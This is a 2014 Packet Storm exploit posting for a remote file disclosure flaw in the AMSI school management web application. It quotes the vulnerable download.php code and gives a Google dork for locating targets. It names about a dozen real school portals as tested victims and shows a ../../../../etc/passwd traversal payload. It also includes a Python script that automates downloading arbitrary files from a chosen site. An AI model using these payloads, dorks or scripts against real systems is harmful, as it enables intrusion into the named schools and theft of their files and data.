AMSI 3.20.47 Build 37 File Disclosure

2014-12-23T00:00:00
ID PACKETSTORM:129714
Type packetstorm
Reporter KnocKout
Modified 2014-12-23T00:00:00

Description

                                        
                                            ` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \  
\_____ \ | __)_ / \ \/   
/ \ | \\ \____  
/_______ //_______ / \______ /  
\/ \/ \/   
AMSI v3.20.47 build 37 <= Remote File Disclosure Exploit (.py)  
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : knockout@e-mail.com.tr  
[~] Exploit Developed by : B3mB4m  
[~] HomePage : http://h4x0resec.blogspot.com  
[~] Guzel Insanlar : ZoRLu, ( milw00rm.com ),   
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,   
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs  
###########################################################  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : AMSI ( Academia management solutions international )  
|~Affected Version : v3.20.47 build 37  
|~Software : http://amsi.ae - http://iconnect.ae  
|~RISK : Medium  
|~Google Keyword/Dork : inurl:"?load=news/search_news"  
|~Tested On : [L] Kali Linux \ [R] example sites  
####################INFO################################  
makes it possible to read all the files from the local base.  
#######################################################  
  
### Error Line in 'download.php' ##   
  
..  
$path = str_replace('/download.php?file=','',$_SERVER['REQUEST_URI']);   
// $path = $_GET['file'];   
header("Content-Description: File Transfer");  
header("Content-Type: application/force-download");  
//header("Content-Disposition: attachment; filename=" . basename($path . $uri[1]));  
header("Content-Disposition: attachment; filename=\"" . basename($path . $uri[1]) . "\"" );  
  
@readfile($path);  
..  
########################################################  
Example and tested on;  
  
http://portal.iconnect.ae/  
http://demo.iconnect.ae/  
http://barsha.almawakeb.sch.ae/  
http://portal.naischool.ae/  
http://portal.ias-dubai.ae/  
http://portal.madarschool.ae/  
http://portal.isas.sch.ae/  
http://portal.alsanawbarschool.com/  
http://fia.fischools.com/  
http://portal.ajyal.sch.ae/  
http://portal.arabunityschool.com/  
http://alnashaa.sch.ae/  
http://portal.aaess.com/  
  
############################################################  
Manual Exploitation; http://$VICTIM/download.php?file=../../../../etc/passwd  
############################################################  
=========Automatic File Source Downloader Exploit ========  
##################### exploit.py ##############################  
  
# Coded by b3mb4m   
  
import random  
import os  
import urllib  
  
class B3mB4m(object):  
def example(self):  
print """  
  
How to use ?   
Website: http://VICTIM.com  
Path : /download.php?file=../../../../etc/passwd  
"""   
  
def exploit(self):  
ask = raw_input("Website :")  
uz = raw_input("Path : ")  
  
#ask = "http://alnashaa.sch.ae"  
#uz = "/download.php?file=../../../../etc/passwd"  
  
uniq = str(random.randrange(1,1000+1))+".txt"  
filee = ask+uz  
  
try:  
urllib.urlretrieve(filee, uniq);   
print "\t\nDownload complate ! "  
os.startfile(uniq)  
except:  
B3mB4m().example()   
  
  
if __name__ == '__main__':  
B3mB4m().exploit()  
  
  
`